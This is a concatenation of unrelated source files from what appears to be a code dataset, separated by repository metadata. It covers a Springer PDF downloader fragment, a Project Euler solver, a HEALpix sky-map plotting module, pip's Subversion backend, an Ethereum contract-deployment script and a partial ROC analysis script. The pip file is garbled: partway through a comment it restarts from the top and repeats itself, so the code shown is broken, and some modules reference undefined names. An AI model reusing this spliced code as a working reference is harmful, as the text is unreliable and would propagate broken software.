    html = requests.get(link).text
    soup = BeautifulSoup(html, "html.parser")
    # soup.h1 renders as "<h1>TITLE</h1>"; strip the tags and whitespace
    name = str(soup.h1)[4:-5].strip()

    # Produce the filename: CamelCased alphanumeric words + ".pdf"
    name = name.split()
    for i in range(len(name)):
        name[i] = "".join(x for x in name[i] if x.isalnum())
        name[i] = name[i].capitalize()
    name = "".join(name)
    name = name + ".pdf"

    # Get the download link
    code = link.split("/")[-1]
    url = "https://link.springer.com/content/pdf/{}.pdf".format(code)

    # Download and write the file; the context manager guarantees the PDF is
    # flushed and closed even if a later iteration raises.
    print("Downloading {}...".format(name), end = "", flush = True)
    raw_file = requests.get(url)
    with open(name, "wb") as out_file:
        out_file.write(raw_file.content)
    print("finished!", flush = True)
|
[
"ukn@comcast.net"
] |
ukn@comcast.net
|
7829c466f26fa0120679a7f491fb837936a2ed43
|
c1bed5203d73a077ff83b96cc6fe71a3fce734e7
|
/python/pe051.py
|
1580b96a9d2d23aaa0492f9402a25e9228eb9f07
|
[] |
no_license
|
arknave/project-euler
|
41006e571e24d8aa077247bdb806be3ba8818c40
|
647783721d4d019c41ec844500069baeab6d8a44
|
refs/heads/master
| 2022-12-23T06:36:14.647022
| 2022-12-14T23:20:49
| 2022-12-14T23:20:49
| 19,319,963
| 0
| 1
| null | 2015-05-21T06:42:41
| 2014-04-30T16:28:50
|
Python
|
UTF-8
|
Python
| false
| false
| 847
|
py
|
from math import ceil, sqrt
CAP = 1000000  # upper search bound for candidate primes (Project Euler 51)
def replace(x, a, b):
    """Return integer x with every decimal digit a replaced by digit b."""
    swapped = str(x).replace(str(a), str(b))
    return int(swapped)
def is_prime(n):
    """Trial-division primality test.

    Fixes two defects in the original: 2 was reported composite (the
    `n % 2 == 0` shortcut fired before special-casing 2), and every n < 2 —
    e.g. 1 — was reported prime because the trial loop never executed.
    """
    if n < 2:
        return False
    if n == 2:
        return True
    if n % 2 == 0:
        return False
    for i in range(3, int(ceil(sqrt(n))) + 1, 2):
        if n % i == 0:
            return False
    return True
def main():
    # NOTE(review): this function is Python 2 only (xrange, print statements);
    # replace() and is_prime() above also run under Python 3.
    # Project Euler 51: scan odd numbers below CAP for a prime whose
    # repeated-digit replacements form a family of >= 7 primes; print the
    # smallest member of each qualifying family.
    for i in xrange(1, CAP, 2):
        if not is_prime(i):
            continue
        rep = i
        si = str(i)
        for x in xrange(10):
            count = 1
            sx = str(x)
            for y in xrange(x + 1, 10):
                sy = str(y)
                new = replace(i, x, y)
                # Only count replacements when digit x actually occurs in i.
                if sx in si and is_prime(new):
                    count += 1
                    rep = min(rep, new)
            if count >= 7:
                print '----'
                print rep, count
if __name__ == '__main__':
    main()
|
[
"arnavsastry@gmail.com"
] |
arnavsastry@gmail.com
|
91d3b6fdca909c5fc49a4df17c4eb75ffdb7535b
|
6d8faae66dd6332836bb11d7f02d6867c95d2a65
|
/glast/pointlike/python/uw/like2/pub/display_map.py
|
72aca3d85c05496761ea2c0320817f57cf99b341
|
[] |
no_license
|
Areustle/fermi-glast
|
9085f32f732bec6bf33079ce8e2ea2a0374d0228
|
c51b821522a5521af253973fdd080e304fae88cc
|
refs/heads/master
| 2021-01-01T16:04:44.289772
| 2017-09-12T16:35:52
| 2017-09-12T16:35:52
| 97,769,090
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,663
|
py
|
"""
Manage generation of maps from HEALpix tables
$Header: /glast/ScienceTools/glast/pointlike/python/uw/like2/pub/Attic/display_map.py,v 1.1.2.1 2015/08/13 18:03:10 jasercio Exp $
"""
import os,sys, types, pickle
import numpy as np
import pylab as plt
from uw.utilities import image
from skymaps import Band, SkyDir, PySkyFunction, Hep3Vector, SkyImage
def skyplot(crec, title='', axes=None, fignum=30, ait_kw={}, **kwargs):
""" make an AIT skyplot of a HEALpix array
crec : array
must be sorted according to the HEALpix index
title : string
set the figure title
ait_kw : dict
to set kwargs for image.AIT, perhaps pixelsize
Other args passed to imshow
"""
n = len(crec)
nside = int(np.sqrt(n/12))
assert n==12*nside**2, 'wrong length to be healpix array'
band = Band(nside)
def skyplotfun(v):
skydir = SkyDir(Hep3Vector(v[0],v[1],v[2]))
index = band.index(skydir)
return crec[index]
if axes is None:
plt.close(fignum)
fig = plt.figure(fignum, figsize=(12,6))
ait=image.AIT(PySkyFunction(skyplotfun) ,axes=axes, **ait_kw)
ait.imshow(title=title, **kwargs)
return ait
class DisplayMap(object):
""" display the contents of a HEALpix table as ait or zea
"""
def __init__(self, table,
sources=None,
imshow_kw=dict(interpolation='bilinear', ),
**kwargs):
"""table : string or iterable
If a string, the name of a pickled file
sources : None or a string
if a string, the name of a pickled rec with name, ra, dec fields
"""
if type(table)==types.StringType:
self.v = pickle.load(open(table))
print 'Loaded HEALpix table from file %s' %table
else: self.v=table
self.nside = int(np.sqrt(len(self.v)/12))
assert len(self.v)==12*self.nside**2, 'size of map not consistent with expected nside %d' % nside
self.band = Band(self.nside)
self.imshow_kw=imshow_kw
self.scale = kwargs.pop('scale', lambda x: x)
if type(self.scale) == types.StringTypes:
if self.scale=='sqrt': self.scale= lambda x: np.sqrt(max(x,0))
elif self.scale=='log': self.scale=lambda x: np.log10(max(x,0.1))
else:
raise Exception, 'unrecognized scale function, %s' %self.scale
self.ZEA_kw = kwargs.pop('ZEA_kw', dict(galactic=True, size=10, pixelsize=0.1))
if sources is not None:
self.sources = pickle.load(open(sources))
print 'loaded %d sources from %s' % (len(self.sources),sources)
else:self.sources=None
self.map_path = kwargs.pop('map_path',None)
def get_pyskyfun(self):
return PySkyFunction(self)
def skyfun(self, v):
skydir = SkyDir(Hep3Vector(v[0],v[1],v[2]))
return self.v[self.band.index(skydir)]
def __call__(self,v):
skydir = SkyDir(Hep3Vector(v[0],v[1],v[2]))
t =self.v[self.band.index(skydir)]
return self.scale(t)
def fill_ait(self, fignum=11, axes=None, show_kw={}, source_kw={}, figwidth=12, margin=0.15, **kwargs):
if axes is None:
# set up a figure for 2x1 image with equal margins
plt.close(fignum)
figheight = figwidth*(1.+2*margin)/(1+margin)/2.
fig=plt.figure(fignum, figsize=(figwidth, figheight));
axes=plt.gca()
plt.subplots_adjust(left=0.05, right=0.95) #gives reasonable equal margins
pixelsize = kwargs.pop('pixelsize', 0.25)
ait = image.AIT(self.get_pyskyfun(),axes=axes, pixelsize=pixelsize, **kwargs)
self.imgplot=ait.imshow(**show_kw)
ait.axes.set_autoscale_on(False)
if self.sources is not None:
sdirs = map(SkyDir, self.sources.ra, self.sources.dec)
ait.plot(sdirs, **source_kw)
print 'found %d sources to plot' % len(sdirs)
plt.draw_if_interactive()
return ait
def fill_zea(self, index, fignum=12, axes=None, show_kw=None, **kwargs):
""" index: integer, or a SkyDir
the HP12 index if integer
figmun: integer
used if axes is None
show_kw : dict
override imshow keywords
kwargs
size
pixelsize
galactic
"""
if axes is None:
plt.close(fignum)
fig = plt.figure(fignum,figsize=(6,6));
axes = fig.gca()
if type(index) == types.IntType:
sdir = Band(12).dir(index)
title = 'HP12_%4d'%index
else:
sdir = index
title = 'l = %.1f, b=%.1f' % (sdir.l(), sdir.b())
title = kwargs.pop('title',title)
kw = self.ZEA_kw
kw.update(kwargs)
zea = image.ZEA(sdir, **kw)
zea.grid()
zea.fill(self.get_pyskyfun())
zea.imshow( **(show_kw if show_kw is not None else self.imshow_kw))
zea.colorbar()
if title is not None: axes.set_title(title)
if self.sources is not None:
count = 0
for s in self.sources:
sdir = SkyDir(s.ra,s.dec)
if not zea.inside(sdir):continue
count += 1
inside =self.band.index(sdir)==index
zea.plot_source(s.name, sdir, symbol='*' if inside else 'd',
markersize=14 if inside else 8,
color='w')
print 'found %d sources to plot' %count
if self.map_path is not None:
fout = os.path.join(self.map_path,hpname(index)+'.png')
plt.savefig(fout, bbox_inches='tight')
print 'saved figure to %s' % fout
plt.draw_if_interactive()
return zea
class SourceDensity(object):
""" create source density HEALpix array from a list of locations
"""
def __init__(self, nside=12):
"""
nside: integer
the HEALpix nside parameter
"""
self.v = np.zeros(12*nside**2, float)
self.index = Band(nside).index
def fill(self, sdirs):
""" sdirs: a list of SkyDir objects
"""
for s in sdirs:
self.v[self.index(s)]+=1
def fill_rec(self, rec, cut=None):
""" rec: a recarry with ra, dec columns
cut : None or a mask arrray
"""
if cut is None:
sdirs = map(SkyDir, rec.ra, rec.dec)
else:
sdirs = map(SkyDir, rec.ra[cut], rec.dec[cut])
self.fill(sdirs)
def save(self, fn):
pickle.dump(self.v, open(fn, 'wb'))
print 'saved file %s' % fn
class SourceMap(DisplayMap):
""" subclass of DisplayMap to display point source positions on a photon density map
"""
def __init__(self, kde,
sources ,
show_kw=dict(fun = lambda x:np.sqrt(x/1e6), vmax=4, cmap='hot'),
plot_kw=dict(nocolorbar=False,),
pos=None, size=180,
):
super(SourceMap,self).__init__(kde)
if type(sources) == types.StringType:
self.s = pickle.load(sources)
print 'loaded %5d sources from %s' %(len(self.s), fn)
else: self.s = sources
self.show_kw = show_kw
def fill_ait(self, fignum=20, axes=None, **kwargs):
ait = super(SourceMap, self).fill_ait( fignum=fignum, axes=axes, show_kw= self.show_kw, **kwargs)
ait.axes.set_autoscale_on(False) # prevent rescaling when adding points
self.ait=ait
return ait
def fill_zea(self, pos, fignum=21, axes=None, which=-1, savefn=None, **kwargs):
sfactor = kwargs.pop('sfactor', 1)
zea = super(DMap, self).fill_zea(pos, fignum=fignum, axes=axes, show_kw= self.show_kw, **kwargs)
s = self.s
for subset, marker, color, size, label in self.subsets(s, which):
zea.plot(map(SkyDir, s.ra[subset], s.dec[subset]), edgecolor='grey',
marker=marker, c=color, s=size*sfactor, label=label)
print 'plotted %4d sources, subset "%s"' %(sum(subset), label)
plt.legend(scatterpoints=1, loc=2)
if savefn is not None:
self.savefig(savefn % i); i+=1
return zea
def legend(self):
plt.legend(frameon=False,scatterpoints=1, loc=(-0.05,-0.05))
def savefig(self, fn):
plt.savefig(fn, bbox_inches='tight', pad_inches=0, dpi=160)
def subsets(self, s, which):
assoc = s.id_prob>0.8
ts25=s.ts>=25
lt25=(s.ts<25)
t =(((-assoc)*(lt25),'+', 'grey', 8, 'no id, TS<25'),
((-assoc)*(ts25), 's', 'red', 10, 'no id, TS>25'),
(assoc, 'o', 'green', 12, 'associated' ),
)
return t if which <0 else (t[which],)
def add_sources(self, which=-1, sfactor=1):
s = self.s
print 'loaded %5d sources' %(len(s),)
i=0 if which<0 else which+10
plt.rcParams['legend.fontsize']= 8.0
for subset, marker, color, size, label in self.subsets(s, which):
self.ait.plot(map(SkyDir, s.ra[subset], s.dec[subset]), edgecolor='grey',
marker=marker, c=color, s=size*sfactor, label=label)
print 'plotted %4d sources, subset "%s"' %(sum(subset), label)
self.legend()
def load_skyspect(fn = r'T:\data\galprop\ring_21month_P6v11.fits',
# r'D:\fermi\data\galprop\gll_iem_v02.fit',
nside=192,
show_kw = dict(fun=np.log10, cmap='hot'),
):
"""
load a galactic diffuse distribution.
Save the HEALpix respresentation at an energy (1 GeV default)
fn : string
filename for the FITS representaion of a SKySpectrum
nside: int
HEALpix nside to use for represenation -- note that 192 is 12*16, about 0.25 deg
show_kw : dict
fun: weighting function, cmap, vmin, vmax
"""
t = SkyImage(fn)
galname = os.path.split(fn)[-1]
print '%s: nx, ny, layers: %d %d %d' %(galname, t.naxis1(), t.naxis2(), t.layers())
hpdir = Band(nside).dir
dmap = map(lambda i:t(hpdir(i)), xrange(12*nside**2))
tdm=DisplayMap(dmap)
tdm.fill_ait(fignum=12, source_kw=dict(edgecolor='w',), show_kw=show_kw )
plt.title(galname+' (1 GeV)')
sfn = galname.split('.')[0]+'.png'
plt.savefig(galname.split('.')[0]+'.png', bbox_inches='tight', pad_inches=0)
print 'saved figure to %s' % sfn
return tdm
|
[
"areustledev@gmail.com"
] |
areustledev@gmail.com
|
8941cdffeb217a0bbf08ba75b764b8e67f7d4f94
|
10d77a1bca1358738179185081906956faf3963a
|
/venv/Lib/site-packages/pip/_internal/vcs/subversion.py
|
b56967e6d4cffea7d3234a2fb4f8a2995dd7dd3c
|
[] |
no_license
|
ekansh18/WE_Care_NGO_WEBSITE
|
3eb6b12ae798da26aec75d409b0b92f7accd6c55
|
7c1eaa78d966d13893c38e7157744fbf8f377e71
|
refs/heads/master
| 2023-07-16T07:22:48.920429
| 2021-08-31T04:11:19
| 2021-08-31T04:11:19
| 401,563,669
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 17,402
|
py
|
# The following comment should be removed at some point in the future.
# mypy: disallow-untyped-defs=False
from __future__ import absolute_import
import logging
import os
import re
from pip._internal.utils.logging import indent_log
from pip._internal.utils.misc import (
display_path,
is_console_interactive,
rmtree,
split_auth_from_netloc,
)
from pip._internal.utils.subprocess import make_command
from pip._internal.utils.typing import MYPY_CHECK_RUNNING
from pip._internal.vcs.versioncontrol import VersionControl, vcs
_svn_xml_url_re = re.compile('url="([^"]+)"')
_svn_rev_re = re.compile(r'committed-rev="(\d+)"')
_svn_info_xml_rev_re = re.compile(r'\s*revision="(\d+)"')
_svn_info_xml_url_re = re.compile(r'<url>(.*)</url>')
if MYPY_CHECK_RUNNING:
from typing import Optional, Tuple
from pip._internal.utils.subprocess import CommandArgs
from pip._internal.utils.misc import HiddenText
from pip._internal.vcs.versioncontrol import AuthInfo, RevOptions
logger = logging.getLogger(__name__)
class Subversion(VersionControl):
name = 'svn'
dirname = '.svn'
repo_name = 'checkout'
schemes = ('svn', 'svn+ssh', 'svn+http', 'svn+https', 'svn+svn')
@classmethod
def should_add_vcs_url_prefix(cls, remote_url):
return True
@staticmethod
def get_base_rev_args(rev):
return ['-r', rev]
@classmethod
def get_revision(cls, location):
"""
Return the maximum revision for all files under a given location
"""
# Note: taken from setuptools.command.egg_info
revision = 0
for base, dirs, files in os.walk(location):
if cls.dirname not in dirs:
dirs[:] = []
continue # no sense walking uncontrolled subdirs
dirs.remove(cls.dirname)
entries_fn = os.path.join(base, cls.dirname, 'entries')
if not os.path.exists(entries_fn):
# FIXME: should we warn?
continue
dirurl, localrev = cls._get_svn_url_rev(base)
if base == location:
base = dirurl + '/' # save the root url
elif not dirurl or not dirurl.startswith(base):
dirs[:] = []
continue # not part of the same svn tree, skip it
revision = max(revision, localrev)
return revision
@classmethod
def get_netloc_and_auth(cls, netloc, scheme):
"""
This override allows the auth information to be passed to svn via the
--username and --password options instead of via the URL.
"""
if scheme == 'ssh':
# The --username and --password options can't be used for
# svn+ssh URLs, so keep the auth information in the URL.
return super(Subversion, cls).get_netloc_and_auth(netloc, scheme)
return split_auth_from_netloc(netloc)
@classmethod
def get_url_rev_and_auth(cls, url):
# type: (str) -> Tuple[str, Optional[str], AuthInfo]
# hotfix the URL scheme after removing svn+ from svn+ssh:// readd it
url, rev, user_pass = super(Subversion, cls).get_url_rev_and_auth(url)
if url.startswith('ssh://'):
url = 'svn+' + url
return url, rev, user_pass
@staticmethod
def make_rev_args(username, password):
# type: (Optional[str], Optional[HiddenText]) -> CommandArgs
extra_args = [] # type: CommandArgs
if username:
extra_args += ['--username', username]
if password:
extra_args += ['--password', password]
return extra_args
@classmethod
def get_remote_url(cls, location):
# In cases where the source is in a subdirectory, not alongside
# setup.py we have to look up in the location until we find a real
# setup.py
orig_location = location
while not os.path.exists(os.path.join(location, 'setup.py')):
last_location = location
location = os.path.dirname(location)
if location == last_location:
# We've traversed up to the root of the filesystem without
# finding setup.py
logger.warning(
"Could not find setup.py for directory %s (tried all "
"parent directories)",
orig_location,
)
return None
return cls._get_svn_url_rev(location)[0]
@classmethod
def _get_svn_url_rev(cls, location):
from pip._internal.exceptions import InstallationError
entries_path = os.path.join(location, cls.dirname, 'entries')
if os.path.exists(entries_path):
with open(entries_path) as f:
data = f.read()
else: # subversion >= 1.7 does not have the 'entries' file
data = ''
if (data.startswith('8') or
data.startswith('9') or
data.startswith('10')):
data = list(map(str.splitlines, data.split('\n\x0c\n')))
del data[0][0] # get rid o# The following comment should be removed at some point in the future.
# mypy: disallow-untyped-defs=False
from __future__ import absolute_import
import logging
import os
import re
from pip._internal.utils.logging import indent_log
from pip._internal.utils.misc import (
display_path,
is_console_interactive,
rmtree,
split_auth_from_netloc,
)
from pip._internal.utils.subprocess import make_command
from pip._internal.utils.typing import MYPY_CHECK_RUNNING
from pip._internal.vcs.versioncontrol import VersionControl, vcs
_svn_xml_url_re = re.compile('url="([^"]+)"')
_svn_rev_re = re.compile(r'committed-rev="(\d+)"')
_svn_info_xml_rev_re = re.compile(r'\s*revision="(\d+)"')
_svn_info_xml_url_re = re.compile(r'<url>(.*)</url>')
if MYPY_CHECK_RUNNING:
from typing import Optional, Tuple
from pip._internal.utils.subprocess import CommandArgs
from pip._internal.utils.misc import HiddenText
from pip._internal.vcs.versioncontrol import AuthInfo, RevOptions
logger = logging.getLogger(__name__)
class Subversion(VersionControl):
name = 'svn'
dirname = '.svn'
repo_name = 'checkout'
schemes = ('svn', 'svn+ssh', 'svn+http', 'svn+https', 'svn+svn')
@classmethod
def should_add_vcs_url_prefix(cls, remote_url):
return True
@staticmethod
def get_base_rev_args(rev):
return ['-r', rev]
@classmethod
def get_revision(cls, location):
"""
Return the maximum revision for all files under a given location
"""
# Note: taken from setuptools.command.egg_info
revision = 0
for base, dirs, files in os.walk(location):
if cls.dirname not in dirs:
dirs[:] = []
continue # no sense walking uncontrolled subdirs
dirs.remove(cls.dirname)
entries_fn = os.path.join(base, cls.dirname, 'entries')
if not os.path.exists(entries_fn):
# FIXME: should we warn?
continue
dirurl, localrev = cls._get_svn_url_rev(base)
if base == location:
base = dirurl + '/' # save the root url
elif not dirurl or not dirurl.startswith(base):
dirs[:] = []
continue # not part of the same svn tree, skip it
revision = max(revision, localrev)
return revision
@classmethod
def get_netloc_and_auth(cls, netloc, scheme):
"""
This override allows the auth information to be passed to svn via the
--username and --password options instead of via the URL.
"""
if scheme == 'ssh':
# The --username and --password options can't be used for
# svn+ssh URLs, so keep the auth information in the URL.
return super(Subversion, cls).get_netloc_and_auth(netloc, scheme)
return split_auth_from_netloc(netloc)
@classmethod
def get_url_rev_and_auth(cls, url):
# type: (str) -> Tuple[str, Optional[str], AuthInfo]
# hotfix the URL scheme after removing svn+ from svn+ssh:// readd it
url, rev, user_pass = super(Subversion, cls).get_url_rev_and_auth(url)
if url.startswith('ssh://'):
url = 'svn+' + url
return url, rev, user_pass
@staticmethod
def make_rev_args(username, password):
# type: (Optional[str], Optional[HiddenText]) -> CommandArgs
extra_args = [] # type: CommandArgs
if username:
extra_args += ['--username', username]
if password:
extra_args += ['--password', password]
return extra_args
@classmethod
def get_remote_url(cls, location):
# In cases where the source is in a subdirectory, not alongside
# setup.py we have to look up in the location until we find a real
# setup.py
orig_location = location
while not os.path.exists(os.path.join(location, 'setup.py')):
last_location = location
location = os.path.dirname(location)
if location == last_location:
# We've traversed up to the root of the filesystem without
# finding setup.py
logger.warning(
"Could not find setup.py for directory %s (tried all "
"parent directories)",
orig_location,
)
return None
return cls._get_svn_url_rev(location)[0]
@classmethod
def _get_svn_url_rev(cls, location):
from pip._internal.exceptions import InstallationError
entries_path = os.path.join(location, cls.dirname, 'entries')
if os.path.exists(entries_path):
with open(entries_path) as f:
data = f.read()
else: # subversion >= 1.7 does not have the 'entries' file
data = ''
if (data.startswith('8') or
data.startswith('9') or
data.startswith('10')):
data = list(map(str.splitlines, data.split('\n\x0c\n')))
del data[0][0] # get rid of the '8'
url = data[0][3]
revs = [int(d[9]) for d in data if len(d) > 9 and d[9]] + [0]
elif data.startswith('<?xml'):
match = _svn_xml_url_re.search(data)
if not match:
raise ValueError('Badly formatted data: %r' % data)
url = match.group(1) # get repository URL
revs = [int(m.group(1)) for m in _svn_rev_re.finditer(data)] + [0]
else:
try:
# subversion >= 1.7
# Note that using get_remote_call_options is not necessary here
# because `svn info` is being run against a local directory.
# We don't need to worry about making sure interactive mode
# is being used to prompt for passwords, because passwords
# are only potentially needed for remote server requests.
xml = cls.run_command(
['info', '--xml', location],
show_stdout=False,
)
url = _svn_info_xml_url_re.search(xml).group(1)
revs = [
int(m.group(1)) for m in _svn_info_xml_rev_re.finditer(xml)
]
except InstallationError:
url, revs = None, []
if revs:
rev = max(revs)
else:
rev = 0
return url, rev
@classmethod
def is_commit_id_equal(cls, dest, name):
"""Always assume the versions don't match"""
return False
def __init__(self, use_interactive=None):
# type: (bool) -> None
if use_interactive is None:
use_interactive = is_console_interactive()
self.use_interactive = use_interactive
# This member is used to cache the fetched version of the current
# ``svn`` client.
# Special value definitions:
# None: Not evaluated yet.
# Empty tuple: Could not parse version.
self._vcs_version = None # type: Optional[Tuple[int, ...]]
super(Subversion, self).__init__()
def call_vcs_version(self):
# type: () -> Tuple[int, ...]
"""Query the version of the currently installed Subversion client.
:return: A tuple containing the parts of the version information or
``()`` if the version returned from ``svn`` could not be parsed.
:raises: BadCommand: If ``svn`` is not installed.
"""
# Example versions:
# svn, version 1.10.3 (r1842928)
# compiled Feb 25 2019, 14:20:39 on x86_64-apple-darwin17.0.0
# svn, version 1.7.14 (r1542130)
# compiled Mar 28 2018, 08:49:13 on x86_64-pc-linux-gnu
version_prefix = 'svn, version '
version = self.run_command(['--version'], show_stdout=False)
if not version.startswith(version_prefix):
return ()
version = version[len(version_prefix):].split()[0]
version_list = version.split('.')
try:
parsed_version = tuple(map(int, version_list))
except ValueError:
return ()
return parsed_version
def get_vcs_version(self):
# type: () -> Tuple[int, ...]
"""Return the version of the currently installed Subversion client.
If the version of the Subversion client has already been queried,
a cached value will be used.
:return: A tuple containing the parts of the version information or
``()`` if the version returned from ``svn`` could not be parsed.
:raises: BadCommand: If ``svn`` is not installed.
"""
if self._vcs_version is not None:
# Use cached version, if available.
# If parsing the version failed previously (empty tuple),
# do not attempt to parse it again.
return self._vcs_version
vcs_version = self.call_vcs_version()
self._vcs_version = vcs_version
return vcs_version
def get_remote_call_options(self):
# type: () -> CommandArgs
"""Return options to be used on calls to Subversion that contact the server.
These options are applicable for the following ``svn`` subcommands used
in this class.
- checkout
- export
- switch
- update
:return: A list of command line arguments to pass to ``svn``.
"""
if not self.use_interactive:
# --non-interactive switch is available since Subversion 0.14.4.
# Subversion < 1.8 runs in interactive mode by default.
return ['--non-interactive']
svn_version = self.get_vcs_version()
# By default, Subversion >= 1.8 runs in non-interactive mode if
# stdin is not a TTY. Since that is how pip invokes SVN, in
# call_subprocess(), pip must pass --force-interactive to ensure
# the user can be prompted for a password, if required.
# SVN added the --force-interactive option in SVN 1.8. Since
# e.g. RHEL/CentOS 7, which is supported until 2024, ships with
# SVN 1.7, pip should continue to support SVN 1.7. Therefore, pip
# can't safely add the option if the SVN version is < 1.8 (or unknown).
if svn_version >= (1, 8):
return ['--force-interactive']
return []
def export(self, location, url):
# type: (str, HiddenText) -> None
"""Export the svn repository at the url to the destination location"""
url, rev_options = self.get_url_rev_options(url)
logger.info('Exporting svn repository %s to %s', url, location)
with indent_log():
if os.path.exists(location):
# Subversion doesn't like to check out over an existing
# directory --force fixes this, but was only added in svn 1.5
rmtree(location)
cmd_args = make_command(
'export', self.get_remote_call_options(),
rev_options.to_args(), url, location,
)
self.run_command(cmd_args, show_stdout=False)
def fetch_new(self, dest, url, rev_options):
# type: (str, HiddenText, RevOptions) -> None
rev_display = rev_options.to_display()
logger.info(
'Checking out %s%s to %s',
url,
rev_display,
display_path(dest),
)
cmd_args = make_command(
'checkout', '-q', self.get_remote_call_options(),
rev_options.to_args(), url, dest,
)
self.run_command(cmd_args)
def switch(self, dest, url, rev_options):
# type: (str, HiddenText, RevOptions) -> None
cmd_args = make_command(
'switch', self.get_remote_call_options(), rev_options.to_args(),
url, dest,
)
self.run_command(cmd_args)
def update(self, dest, url, rev_options):
# type: (str, HiddenText, RevOptions) -> None
cmd_args = make_command(
'update', self.get_remote_call_options(), rev_options.to_args(),
dest,
)
self.run_command(cmd_args)
vcs.register(Subversion)
|
[
"ekansh00@gmail.com"
] |
ekansh00@gmail.com
|
ca90f995a08ec8b8293fabb25d6eaccee79943e9
|
289232711dc58677af5642c5a86c64c3cb64f2c6
|
/ProgramFiles/PythonModules/injectContract.py
|
1abb72e065b41872de29d62447cfd5859f492c44
|
[
"Apache-2.0"
] |
permissive
|
buypolarbear/Ethereum_citizen_database
|
097ec2a69ad83e0234c3ddb7a0a243bf6f41b668
|
5f05ece47c1072f818aa9d07da6284857a4d11cf
|
refs/heads/master
| 2020-03-11T07:28:32.147478
| 2018-01-21T22:20:35
| 2018-01-21T22:20:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,603
|
py
|
#!/usr/bin/python
import os
import subprocess
import sys
import time
import signal
import ethereumUtils
#__author__ = "Victor Busque"
def run(contract, username, params, gas = 1000000, printing = True, unlocking = False, tipus = "0"):
if not printing:
ethereumUtils.blockPrint()
bytecodes = []
abis = []
tHs = []
cAs = []
address = ""
password = ""
if (tipus == '0'):
address, password = ethereumUtils.get_user_address_pass(username)
elif (tipus == '1'):
address, password = ethereumUtils.get_user_address_pass_entitat_adm(username)
else:
address, password = ethereumUtils.get_user_address_pass_entitat_sub(username)
if unlocking:
ethereumUtils.unlock_account(address, password) # Not necessary, login already unlocked account.
try:
bytecodes = ethereumUtils.get_compilation_result("bin", contract)
abis = ethereumUtils.get_compilation_result("abi", contract)
except:
print "Error at generating or getting contract bytecode or abi."
return 0
print "number of contracts compiled = " + str(len(bytecodes))
try:
for i in range(0, len(abis)):
ethereumUtils.create_injecting_script(abis[i], bytecodes[i], address, params, gas) #CScript.js created
tH = ethereumUtils.try_injection(i)
os.remove("JsContracts/CScript.js")
if tH == None:
print "Returning 0, maybe no sufficient ether."
return 0
else:
tHs.append(tH) #We still don't have the address
cAs.append(None)
except:
print "Error at injecting contracts"
return 0
i = 0
any_not_mined = False
while (i < len(tHs)): #tHs[i] + abis[i] -> cAs[i]
print "Checking for contract " + str(i) + " mining."
with open("Data/ContractDB.db","a") as cDB:
contract_ = str(username+'~'+abis[i]+'~'+'tH:'+tHs[i]+'~'+'cA:\n')
cDB.write(contract_)
for j in range(0,10):
cA = ethereumUtils.retrieve_contract_address(tHs[i])
if cA != None:
print "----- Contract was mined! -----"
cAs[0] = cA
i+=1
break
else:
print "Contract not mined, check number " + str(j)
time.sleep(1)
if j == 9:
any_not_mined = True
i+=1
if any_not_mined:
print "Not every contract was mined, returning 1"
return 1
else:
print "Every contract was mined, returning 2"
return 2
if __name__ == '__main__':
try:
contract = sys.argv[1]
username = sys.argv[2]
gas = sys.argv[3]
tipus = sys.argv[4]
params = []
if (len(sys.argv) > 5):
params = sys.argv[5:]
run(contract, username, params, gas, tipus = tipus, unlocking = True)
except:
print "Parameters: 1. the '.sol', 2.username, 3. gas, +4. parameters"
sys.exit(1)
|
[
"noreply@github.com"
] |
buypolarbear.noreply@github.com
|
f545d9a6ae0d1478b0ac986620e662b86d89c29c
|
91db25466807baa61233c270e5c286e161dae49c
|
/roc.py
|
eb6d391dd41900c3a3afb90f261b8fa65dd77604
|
[] |
no_license
|
asculac/ElectronID
|
52eab5524086086f35669b3bdaf514f60e9685a2
|
b3a2e3bf41c1f4cf65e36c40c1988375ca910e9e
|
refs/heads/master
| 2023-06-28T15:02:32.465063
| 2023-06-09T13:41:47
| 2023-06-09T13:41:47
| 347,088,051
| 0
| 1
| null | 2023-06-09T13:41:48
| 2021-03-12T14:10:38
|
Python
|
UTF-8
|
Python
| false
| false
| 3,213
|
py
|
from sklearn import metrics
import pandas as pd
from config import cfg
import matplotlib.pyplot as plt
from utils import ROCPlot
import uproot
import numpy as np
from sklearn import linear_model
for location in ["EB1_10", "EB1_5", "EB2_5", "EB2_10", "EE_10", "EE_5"]:
# test_v2 = uproot.open('/home/llr/cms/rembser/data/Egamma/20180323_EleMVATraining/test.root')
# test_v2 = uproot.open('/home/llr/cms/rembser/data/Egamma/20180323_EleMVATraining/train_eval.root')
test_v2 = uproot.open('/home/llr/cms/rembser/data_home/Egamma/20180813_EleMVATraining/train_eval.root')
df_v2 = test_v2["ntuplizer/tree"].pandas.df(["Fall17NoIsoV2Vals", "Fall17IsoV2Vals", "ele_pt", "scl_eta", "matchedToGenEle", "genNpu"], entrystop=None)
df = pd.read_hdf("/home/llr/cms/rembser/EgmIDTraining/out/20180813_EleMVATraining/Fall17NoIsoV2/{}/pt_eta_score.h5".format(location))
df_v2 = df_v2.query(cfg["selection_base"])
df_v2 = df_v2.query(cfg["trainings"]["Fall17IsoV2"][location]["cut"])
df_v2.eval('y = ({0}) + 2 * ({1}) - 1'.format(cfg["selection_bkg"], cfg["selection_sig"]), inplace=True)
df_v2 = df_v2.query("y >= 0")
# So we don't get what was used for V2 training
# df_v2 = df_v2[int(len(df_v2*0.75)):]
df_tmva = pd.read_hdf("/home/llr/cms/rembser/EgmIDTraining/out/20180813_EleMVATraining/Fall17NoIsoV2/{}/legacy/pt_eta_score.h5".format(location))
# df_tmva_noiso = pd.read_hdf("/home/llr/cms/rembser/EgmIDTraining/out/20180813_EleMVATraining/Fall17NoIsoV2/{}/legacy/pt_eta_score.h5".format(location))
# ea = pd.read_csv("effAreaElectrons_cone03_pfNeuHadronsAndPhotons_94X.txt", comment="#", delim_whitespace=True, header=None, names=["eta_min", "eta_max", "ea"])
# df_tmva_noiso["ea"] = 0.0
# for i in range(len(ea))[::-1]:
# df_tmva_noiso.at[abs(df_tmva_noiso["scl_eta"]) < ea.iloc[i]["eta_max"], "ea"] = ea.iloc[i]["ea"]
# def add_hzz_iso(df):
# df["hzz_iso"] = (df["ele_pfChargedHadIso"] + np.clip(df["ele_pfNeutralHadIso"] + df["ele_pfPhotonIso"] - df["rho"]*df["ea"], 0, None)) / df["ele_pt"]
# return df
# df_tmva_noiso = add_hzz_iso(df_tmva_noiso)
